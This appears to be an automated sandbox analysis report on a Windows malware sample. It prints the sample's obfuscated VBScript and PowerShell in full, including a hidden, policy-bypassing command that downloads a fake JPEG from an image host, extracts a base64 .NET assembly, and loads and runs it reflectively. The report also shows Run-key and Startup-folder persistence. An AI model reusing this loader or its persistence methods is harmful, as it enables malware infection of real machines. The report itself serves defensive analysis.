Source: Google Drive.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: RegSvcs.lnk.16.dr	LNK file: ..\..\..\..\..\RegSvcs.exe

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe.16.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe.16.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\HP", "HP");IWshNetwork2.MapNetworkDrive("P:", "\\SRVHOMOLOGDC1\Publica", "true");IWshNetwork2.MapNetworkDrive("E:", "\\SRVHOMOLOGDC1\Digitalizacoes", "true");IHost.CreateObject("WScript.Shell");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\RD Web Access.lnk");IWshShortcut.TargetPath("http://app01.system.com.br/RDWeb/Pages/login.aspx");IWshShortcut.IconLocation("\\SRVHOMOLOGDC1\Icones\favicon.ico");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_do_Departamento.lnk");IWshShortcut.TargetPath("S:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_do_Departamento");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_Publica.lnk");IWshShortcut.TargetPath("P:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_Publica");IWshShell3.SendKeys("{F5}");IServerXMLHTTPRequest2.open("GET", "https://pastebin.com/raw/eCmZ7z04", "false");IServerXMLHTTPRequest2.send(); dim inticante , poterantera , ambarvais , tiriva , agitato , Cama , agitato1 poterantera = " " ambarvais = "" & tiriva & poterantera & tiriva & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & tiriva & poterantera & tiriva & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & tiriva & poterantera & tiriva & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & tiriva & poterantera & tiriva & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & tiriva & poterantera & tiriva & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & tiriva & poterantera & tiriva & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & tiriva & poterantera & tiriva & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & tiriva & poterantera & tiriva & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & tiriva & poterantera & tiriva & "gBsDgTreGUDgTre" & tiriva & poterantera & tiriva & "DgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & tiriva & poterantera & tiriva & "gBvDgTreHIDgTre" & tiriva & poterantera & tiriva & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJ

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11173998 push E85DED68h; ret	5_2_00007FFB111739C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11417D9C push ds; ret	5_2_00007FFB11417D9F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11414284 push ss; iretd	5_2_00007FFB11414357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11577800 push eax; iretd	5_2_00007FFB1157780D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB115803D6 push 8B48FFEBh; iretd	5_2_00007FFB115803DC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11580384 push 8B48FFEBh; iretd	5_2_00007FFB11580389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB117C1A28 push eax; iretd	5_2_00007FFB117C1A29

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\System32\cmd.exe

File created: C:\ProgramData\moquenqueiro.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\RegSvcs.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\moquenqueiro.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
